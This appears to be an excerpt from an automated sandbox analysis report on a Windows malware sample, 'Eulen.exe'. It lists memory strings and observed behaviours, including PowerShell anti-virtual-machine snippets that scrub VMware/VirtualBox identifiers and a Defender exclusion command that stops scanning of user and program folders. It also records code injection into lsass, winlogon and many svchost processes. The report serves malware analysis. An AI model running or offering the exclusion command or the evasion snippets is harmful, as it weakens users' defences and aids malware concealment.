          Source: svchost.exe, 00000021.00000003.1682572135.0000024BD36A1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMCI: Using capabilities (0x1c).
          Source: lsass.exe, 00000016.00000000.1538314202.00000213BCE89000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicshutdownNT SERVICE
          Source: svchost.exe, 00000021.00000000.1624072878.0000024BD5200000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pVMwareVirtual disk6000c29198182f16b7176b0e680deba68
          Source: svchost.exe, 00000021.00000000.1636986057.0000024BD5D43000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: $value = $pr.Value.replace("VEN_80EE", $value).replace("VEN_15AD", $value).replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("82801FB", $value).replace("82441FX", $value).replace("82371SB", $value).replace("OpenHCD", $value).replace("VMWare", $value).replace("VMware", $value)
          Source: svchost.exe, 00000021.00000003.1677650585.0000024BD5112000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: nonicNECVMWarVMware SATA CD00
          Source: svchost.exe, 00000021.00000003.1677650585.0000024BD5112000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: LSI_SASVMware Virtual disk 6000c29198182f16b7176b0e680deba6
          Source: powershell.exe, 0000000F.00000002.1566783925.0000015D8022A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
          Source: svchost.exe, 00000021.00000000.1624072878.0000024BD5200000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a@
          Source: svchost.exe, 00000021.00000000.1623531752.0000024BD5024000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmcir:m
          Source: svchost.exe, 00000021.00000003.1677650585.0000024BD5112000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: nonicVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
          Source: svchost.exe, 00000021.00000000.1636986057.0000024BD5D43000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware", $value).replace("VirtualBox", $value).replace("Oracle Corporation", $value).replace("Microsoft Basic Display Adapter", $value)
          Source: svchost.exe, 00000017.00000002.2685559593.000001587065F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
          Source: svchost.exe, 0000001C.00000002.2675634761.000002C06F000000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
          Source: lsass.exe, 00000016.00000000.1538314202.00000213BCE89000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicheartbeatNT SERVICE
          Source: svchost.exe, 00000021.00000000.1623393586.0000024BD3FE2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: dowvmci
          Source: svchost.exe, 00000021.00000003.1681695409.0000024BD5B03000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware
          Source: svchost.exe, 00000021.00000000.1636986057.0000024BD5D43000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: if(($pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "AdapterCompatibility" -or $pr.Name -eq "Description" -or $pr.Name -eq "InfSection" -or $pr.Name -eq "VideoProcessor") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VirtualBox' -or $pr.Value -match 'VMware' -or $pr.Value -match 'Oracle Corporation' -or $pr.Value -match 'Microsoft Basic Display Adapter'))
          Source: svchost.exe, 00000021.00000000.1636986057.0000024BD5D43000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Model" -or $pr.Name -eq "PNPDeviceID") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMware'))
          Source: dwm.exe, 00000018.00000000.1556176246.0000026DACB82000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
          Source: C:\Windows\System32\dialer.exeAPI call chain: ExitProcess graph end nodegraph_14-511
          Source: C:\Users\user\Desktop\Eulen.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\System32\winlogon.exeCode function: 19_2_000002E991757E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_000002E991757E70
          Source: C:\Windows\System32\dialer.exeCode function: 14_2_00007FF6473417F8 GetProcessHeap,HeapAlloc,OpenProcess,TerminateProcess,CloseHandle,GetProcessHeap,HeapFree,14_2_00007FF6473417F8
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\System32\dialer.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\winlogon.exeCode function: 19_2_000002E991757E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_000002E991757E70
          Source: C:\Windows\System32\winlogon.exeCode function: 19_2_000002E991763218 SetUnhandledExceptionFilter,19_2_000002E991763218
          Source: C:\Windows\System32\winlogon.exeCode function: 19_2_000002E99175B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_000002E99175B50C
          Source: C:\Windows\System32\lsass.exeCode function: 22_2_00000213BDCEB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_00000213BDCEB50C
          Source: C:\Windows\System32\lsass.exeCode function: 22_2_00000213BDCE7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_00000213BDCE7E70
          Source: C:\Windows\System32\lsass.exeCode function: 22_2_00000213BDCF3218 SetUnhandledExceptionFilter,22_2_00000213BDCF3218
          Source: C:\Windows\System32\svchost.exeCode function: 23_2_00000158709D7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_00000158709D7E70
          Source: C:\Windows\System32\svchost.exeCode function: 23_2_00000158709DB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_00000158709DB50C
          Source: C:\Windows\System32\svchost.exeCode function: 23_2_00000158709E3218 SetUnhandledExceptionFilter,23_2_00000158709E3218
          Source: C:\Windows\System32\dwm.exeCode function: 24_2_0000026DB15D3218 SetUnhandledExceptionFilter,24_2_0000026DB15D3218
          Source: C:\Windows\System32\dwm.exeCode function: 24_2_0000026DB15C7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_0000026DB15C7E70
          Source: C:\Windows\System32\dwm.exeCode function: 24_2_0000026DB15CB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_0000026DB15CB50C
          Source: C:\Windows\System32\svchost.exeCode function: 26_2_000002A3F0667E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,26_2_000002A3F0667E70
          Source: C:\Windows\System32\svchost.exeCode function: 26_2_000002A3F066B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,26_2_000002A3F066B50C
          Source: C:\Windows\System32\svchost.exeCode function: 26_2_000002A3F0673218 SetUnhandledExceptionFilter,26_2_000002A3F0673218
          Source: C:\Windows\System32\svchost.exeCode function: 27_2_000002C9AFBBB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,27_2_000002C9AFBBB50C
          Source: C:\Windows\System32\svchost.exeCode function: 27_2_000002C9AFBB7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,27_2_000002C9AFBB7E70
          Source: C:\Windows\System32\svchost.exeCode function: 27_2_000002C9AFBC3218 SetUnhandledExceptionFilter,27_2_000002C9AFBC3218
          Source: C:\Windows\System32\svchost.exeCode function: 27_2_000002C9B02A3218 SetUnhandledExceptionFilter,27_2_000002C9B02A3218
          Source: C:\Windows\System32\svchost.exeCode function: 27_2_000002C9B0297E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,27_2_000002C9B0297E70
          Source: C:\Windows\System32\svchost.exeCode function: 27_2_000002C9B029B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,27_2_000002C9B029B50C
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_000002C06FD47E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_000002C06FD47E70
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_000002C06FD53218 SetUnhandledExceptionFilter,28_2_000002C06FD53218
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_000002C06FD4B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_000002C06FD4B50C
          Source: C:\Windows\System32\svchost.exeCode function: 29_2_000002917C3BB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,29_2_000002917C3BB50C
          Source: C:\Windows\System32\svchost.exeCode function: 29_2_000002917C3C3218 SetUnhandledExceptionFilter,29_2_000002917C3C3218
          Source: C:\Windows\System32\svchost.exeCode function: 29_2_000002917C3B7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,29_2_000002917C3B7E70
          Source: C:\Windows\System32\svchost.exeCode function: 29_2_000002917C97B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,29_2_000002917C97B50C
          Source: C:\Windows\System32\svchost.exeCode function: 29_2_000002917C983218 SetUnhandledExceptionFilter,29_2_000002917C983218
          Source: C:\Windows\System32\svchost.exeCode function: 29_2_000002917C977E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,29_2_000002917C977E70
          Source: C:\Windows\System32\svchost.exeCode function: 30_2_000002238279B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,30_2_000002238279B50C
          Source: C:\Windows\System32\svchost.exeCode function: 30_2_00000223827A3218 SetUnhandledExceptionFilter,30_2_00000223827A3218
          Source: C:\Windows\System32\svchost.exeCode function: 30_2_0000022382797E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,30_2_0000022382797E70
          Source: C:\Windows\System32\svchost.exeCode function: 31_2_0000028A1B88B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,31_2_0000028A1B88B50C
          Source: C:\Windows\System32\svchost.exeCode function: 31_2_0000028A1B887E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,31_2_0000028A1B887E70
          Source: C:\Windows\System32\svchost.exeCode function: 31_2_0000028A1B893218 SetUnhandledExceptionFilter,31_2_0000028A1B893218
          Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001486AD77E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,32_2_000001486AD77E70
          Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001486AD7B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,32_2_000001486AD7B50C
          Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001486AD83218 SetUnhandledExceptionFilter,32_2_000001486AD83218
          Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001486ADD7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,32_2_000001486ADD7E70
          Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001486ADDB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,32_2_000001486ADDB50C
          Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001486ADE3218 SetUnhandledExceptionFilter,32_2_000001486ADE3218
          Source: C:\Windows\System32\svchost.exeCode function: 33_2_0000024BD3CD7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,33_2_0000024BD3CD7E70
          Source: C:\Windows\System32\svchost.exeCode function: 33_2_0000024BD3CE3218 SetUnhandledExceptionFilter,33_2_0000024BD3CE3218
          Source: C:\Windows\System32\svchost.exeCode function: 33_2_0000024BD3CDB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,33_2_0000024BD3CDB50C
          Source: C:\Windows\System32\svchost.exeCode function: 33_2_0000024BD3D37E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,33_2_0000024BD3D37E70
          Source: C:\Windows\System32\svchost.exeCode function: 33_2_0000024BD3D43218 SetUnhandledExceptionFilter,33_2_0000024BD3D43218
          Source: C:\Windows\System32\svchost.exeCode function: 33_2_0000024BD3D3B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,33_2_0000024BD3D3B50C
          Source: C:\Windows\System32\svchost.exeCode function: 34_2_000001FA73D67E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,34_2_000001FA73D67E70
          Source: C:\Windows\System32\svchost.exeCode function: 34_2_000001FA73D73218 SetUnhandledExceptionFilter,34_2_000001FA73D73218
          Source: C:\Windows\System32\svchost.exeCode function: 34_2_000001FA73D6B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,34_2_000001FA73D6B50C
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeCode function: 39_2_00000249E4303218 SetUnhandledExceptionFilter,39_2_00000249E4303218
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeCode function: 39_2_00000249E42F7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,39_2_00000249E42F7E70
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeCode function: 39_2_00000249E42FB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,39_2_00000249E42FB50C
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeCode function: 39_2_00000249E4333218 SetUnhandledExceptionFilter,39_2_00000249E4333218
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeCode function: 39_2_00000249E4327E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,39_2_00000249E4327E70
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeCode function: 39_2_00000249E432B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,39_2_00000249E432B50C
          Source: C:\Windows\System32\svchost.exeCode function: 41_2_000001CD02407E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,41_2_000001CD02407E70
          Source: C:\Windows\System32\svchost.exeCode function: 41_2_000001CD0240B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,41_2_000001CD0240B50C
          Source: C:\Windows\System32\svchost.exeCode function: 41_2_000001CD02413218 SetUnhandledExceptionFilter,41_2_000001CD02413218
          Source: C:\Windows\System32\svchost.exeCode function: 42_2_00000269BA66B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,42_2_00000269BA66B50C
          Source: C:\Windows\System32\svchost.exeCode function: 42_2_00000269BA673218 SetUnhandledExceptionFilter,42_2_00000269BA673218
          Source: C:\Windows\System32\svchost.exeCode function: 42_2_00000269BA667E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,42_2_00000269BA667E70
          Source: C:\Windows\System32\svchost.exeCode function: 42_2_00000269BA6CB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,42_2_00000269BA6CB50C
          Source: C:\Windows\System32\svchost.exeCode function: 42_2_00000269BA6D3218 SetUnhandledExceptionFilter,42_2_00000269BA6D3218
          Source: C:\Windows\System32\svchost.exeCode function: 42_2_00000269BA6C7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,42_2_00000269BA6C7E70

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
          Source: C:\Users\user\Desktop\Eulen.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -ForceJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\winlogon.exe base: 2E991720000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\lsass.exe base: 213BDCB0000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 158709A0000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dwm.exe base: 26DB1590000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2A3EFFC0000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2C9AFB80000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2C06F7B0000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2917C380000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 22382760000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 28A1B1D0000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1486AD40000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 24BD3CA0000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1FA73D30000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1CD021B0000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 269B9FD0000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 22054D80000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 27C57DA0000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2A333B40000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe base: 249E3EE0000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1F174530000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 23315740000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2A9C8540000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1EC212A0000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1876D540000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 22CD8950000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 15104330000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 22308E70000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1AB19360000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1E731800000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1A6DD9B0000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1E2FA1C0000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\spoolsv.exe base: D50000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 209D2560000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1FC05190000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2AFD1A00000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1D6B0C10000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2036E5A0000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 150FC6C0000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2480FAC0000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2671A930000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2C588F90000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1A8857C0000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 174DEDC0000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 282A2110000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1DA09D90000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 287FBEC0000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\sihost.exe base: 2537C620000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 29B59750000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20CAB590000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1BBF95A0000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1D49EEE0000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\ctfmon.exe base: 26E2B2E0000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1B0CC6E0000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\explorer.exe base: 8790000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 23014DD0000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 21744F70000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1F02ED50000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dasHost.exe base: 1B2E6AF0000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 25A84C20000 protect: page execute and read and writeJump to behavior
